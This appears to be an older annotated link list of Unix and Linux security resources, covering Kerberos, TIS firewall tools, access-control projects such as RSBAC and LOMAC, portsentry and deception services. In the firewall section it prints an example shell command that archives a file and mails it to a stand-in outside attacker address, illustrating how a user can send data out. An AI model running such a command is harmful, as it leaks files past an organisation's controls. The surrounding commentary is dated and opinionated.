There happen to be security problems with Unix-based systems fundamentally because:
Securing computer systems is a nontrivial task, and
Unix systems do get challenged when they are used for applications needing security.
People do not (or at least should not) use PC operating systems like MS-DOS or Windows 95 for applications that require information security, as they are extremely insecure for such purposes. (They have never been officially rated, but would fall into "D" level were there certifications for that level.) Microsoft is not a vendor of secure operating systems, even at their best. Windows NT is only secure for such purposes (e.g. - "C2 Certified") if:
You run the particular Compaq or Digital hardware models specified by NIST,
You run the particular version of Windows NT (3.50, I believe) specified by NIST,
You remove the floppy drive from the computer, and
You remove network connectivity, and
You configure Windows NT as specified by NIST.
Windows NT is largely useless for anything other than a network server, and thus removal of network connectivity makes it useless.
You can secure virtually any computer if you encase it in lead and concrete and place it at the bottom of the ocean. The computer is not likely to be too useful under such conditions, though.
A more recent security evaluation has been done; it may be best understood by making reference to Understanding the Windows EAL4 Evaluation which tells us:
Security experts have been saying for years that the security of the Windows family of products is hopelessly inadequate. Now there is a rigorous government certification confirming this.
ftp://ftp.auscert.org.au/pub/auscert/papers/unix_security_checklist
This represents the software making up catiocation> tcpd secures and monitors incoming service requests, providing a security layer wrapped around the network services defined in /etc/services. Accesses may be logged, permitted, denied, redirected, all in a fashion transparent to the outside user.
Network Associates: Vendors of TIS Firewall Toolkit
Trusted Internet Systems provides a freely usable (but not GNUed) set of tools for building firewalls. The design approach involves using trustable components to ensure that correctness can be verified both at component levels and at the "whole system" level. The source code has got to be reviewable by the security team in order to verify that there are no "trap doors."
There's enough flexibility in the TIS tools that security can be made restrictive ("fascist") when necessary and also more permissive as appropriate. There's little sense in forbidding outgoing FTP connections, for instance, if outgoing mail is permitted. If a user wants to send data outside (and they have mail access), they can always turn it into email and mail it out: echo 'filename' | cpio -o | uuencode filename.cpio | \ mail -s 'security breach' badguy@outside.example.com
SafeTP - Uses cryptographic connection negotiation to provide a secure alternative interoperable with FTP
Particularly directed to clarify terms used in the context of information security. Its definition of the word hacker is quite interesting.
A pretty decent introduction to security-related terminology.
Harris Computer Systems Corporation CX/SX Version 6.1.1 B1 Rating
Note that: "CX/SX is designed to be software compatible with CX/UX while adding additional security features. CX/SX provides the traditional Unix user-specified access controls of protection bits for discretionary access control. "
VTun Virtual Tunnels over TCP/IP
If you want to have a secure network connection from one spot to another, and can only use the insecure Internet, then use this, to route traffic (encrypted) from one host, at one end, to the other host, at the other end. The point of the exercise is to make the tunnel invisible to client machines on the LAN; they don't know that the "tunnel" is there...
A B3 secure OS which has a Multics-like security model, segmented demand paged VM, and a multi-layer ring structure isolation mechanism. It provides a Unix API; an upcoming version is planned to provide a Linux-compatible API.
Mitre's Top 25 Vulnerability List
This lists 25 "most attackable" sorts of questionable development patterns.
Kerberos is a distributed authentication system originally developed at MIT. It allows users and services to authenticate themselves to one another. It uses strong cryptography to transmit authentication tickets that allow users to assert their identities in an unequivocal manner to services in order to gain access.
Once the user logs in, and is authenticated by some scheme (password or otherwise), they can then request "tickets" for access to some service from an authentication server, which can then be submitted to the service to establish access permission.
Tickets have a limited lifetime; they may be used for an extended period of time, thus limiting the number of "ticket requests" that have to be made, but since the time is limited, a nefarious interloper does not have an unlimited time in which they might attempt to use a "stolen ticket."
A number of pieces of network-related software running on Unix are "Kerberized;" this means that you may (perhaps optionally) authenticate access using Kerberos rather than via the traditional "UserID/Password" combination. This commonly includes telnet, the Unix "rlogin" tool suite, and X11. Some commercial software, including SAP R/3 , can use Kerberos as their authentication protocol. It is also quite common for infrastructure services such as IMAP mail servers, wikis, and instant messaging systems to allow using Kerberos for authentication.
A number of vendors sell libraries to integrate Kerberos authentication support into Unix and Windows applications.
Kerberos has been one of the most heavily used of the "single sign-on" solutions; it allows a single authentication to be used against multiple services, and does so fairly securely since password validation is done only against the Kerberos domain server. Individual servers/services do not need to have access to sensitive authentication data - they merely need to be able to forward requests for "tickets" to the authentication server.
Of course, by centralizing authentication to Kerberos, one must accept some risks:
The Kerberos authentication server represents a nice juicy "target"; if successfully attacked, the attacker may gain control over access to a large number of services.
Of course, in a well-managed Kerberized environment, some effort will go into protecting that target, so it shouldn't be an easy target.
The Kerberos service is the nexus of possible "denial of service" attacks; any interruption of its service will interrupt all other services that depend on it.
Again, this risk may be mitigated. But it still certainly must be considered.
Designing an Authentication System: A Dialogue in Four Scenes
This essay explains Kerberos protocol in "plain English"
Most of the design work associated with this will deal with the user tools (including packaging tools like RPM or dpkg), as it is useless to have sophisticated security components without sufficiently powerful tools to manage it...
Including a fairly decent two page Quick Reference Guide...
POSIX Access Control Lists (ACLs) for Linux
This is an effort to implement POSIX-like Access Control Lists for Linux.
This project takes an approach similar to the Novell Netware notion of trustees. Trustees are bound to files/directories, and are used to grant/deny access to groups of users.
RSBAC is mostly a big patch for current Linux kernels. It is based on the Generalized Framework for Access Control (GFAC) by Abrams and LaPadula and provides a flexible system of access control based on several modules.
All security relevant system calls are extended by security enforcement code. This code calls the central decision component, which in turn calls all active decision modules and generates a combined decision. This decision is then enforced by the system call extensions.
A general goal of RSBAC is to some day reach Orange Book (TCSEC) B1 level. For this many special problems have been and will have to be addressed.
Linux-Privs - Adding VMS-like Capabilities/Privileges to Linux
Maximum Linux Security : A Hacker's Guide to Protecting Your Linux Server and Worstation
A discussion of security tips:
With the thought to simply slow down an attack, here are some more things that can be put to good use:
| ||
| --Randall Raemon | ||
FreeVSD - Virtual Server Daemon
FreeVSD enables many 'Linux platforms' on a single physical server, each identical to the main Linux directory structure; each Virtual Server has its own IP address and view of the process table, allowing web servers and other applications to be deployed and administered discretely, without compromise to security.
VXE - Virtual eXecuting Environment
VXE (Virtual eXecuting Environment) protects Unix servers from intruders, hacker attacks from network and so on. It protects software subsystems, such as: SMTP, POP, HTTP and any other subsystem, already installed on the server.
VXE description (VXED) is small LISP program (set of functions) which use declarative description of acceptable parameters for different system calls. This VXED loaded to the kernel, controls system calls parameters from the specified subsystem. So VXEDs are dynamically loadable modules, handled by the small LISP interpreter, inserted into the kernel. In current VXE version, this is vxelisp, derived from RefLisp. vxelisp has new internal bigstring representation, full set of string and bit functions. The kernel version of vxelisp is reentrant, to handle different VXEDs simultaneously.
Yahoo - National Security Agency Selects Secure Computing to Provide Type Enforcement on Linux
This is effectively an outgrowth of the Flask security architecture, continuing the efforts of the Distributed Trusted Operating System (DTOS) Project.
Sentry is a program that protects computers running linux from various break-in attempts and assaults. It does this by dropping the IP addresses of the attackers into the computer's /etc/hosts.deny file when it detects a port scan.
To detect a port scan, Sentry binds itself to various ports that are not in use and are specified by the sentry.conf file in one's /etc directory.
When an attacker performs a scan on one of these ports, they are immediately added to the hosts.deny file and then dropped via tcp wrappers onto a dead, non-existent host like 333.444.555.666.
Sentry has proven extremely effective against assaults. To give anecdotal evidence, a friend of mine who runs linux and uses sentry has now accumulated a 2 megabyte hosts.deny file.
Amongst other measures, I run portsentry, and have a sizable list of blocked hosts.
Using deception to counter security attacks. Essentially, leaving apparent vulnerabilities to catch would-be attackers off-guard, lulling them into a false sense of security in your apparent insecurity.
You might, for instance, create a fake service 25 for Sendmail that makes it appear that you're running a terribly insecure version, whilst reality is that you are toying with the attacker, collecting information on them.
One cute idea they have is to have a pseudo-Sendmail tie up spam producers; if a request comes in from a known spam producer, you might accept the connection, and respond with a stream such as
250-This is Sendmail version 8.8.5 |
Note that this is not an attack; it is only initiated if they decide to connect to your server.
It is a bit of a paradox to slow down Internet connections in order to use them better, but at least is an entertaining paradox...
SUBTERFUGUE is a framework for observing and playing with the reality of software; it's a foundation for building tools to do tracing, sandboxing, and many other things. You could think of it as "strace meets expect".
Providing a hopefully-tidy way of getting at information about:
Security advisories
Articles on security
General Dynamics Mission Systems
Maker of Pitbull, a secure platform certified at the B1 level, which runs atop Linux .
LOMAC is a security enhancement for Linux that uses Low Water-Mark Mandatory Access Control to protect the integrity of processes and data from viruses, Trojan horses, malicious remote users, and compromised root daemons. LOMAC is implemented as a loadable kernel module - no kernel recompilations or changes to existing applications are required. Although some features and fixes remain to be implemented, LOMAC presently provides sufficient protection to thwart script-kiddies, and is stable enough for everyday use.
Obsolesced by later work such as RSBAC in ~2002.
Generating a random password:
head -c 6 /dev/random | mmencode
SASL - Simple Authentication and Security Layer
A method for adding authentication support to connection-oriented protocols. It can manage authentication using a variety of existing mechanisms, including Kerberos. A natural extension is to also use some encryption scheme such as AES or Blowfish to encrypt transmissions.
Projects using SASL include IMAP servers, LDAP servers, with others likely in the future.
Configuring an IPSec Tunnel Between a Linux PC with the VPN 3000 Client and VPN 3000 Concentrator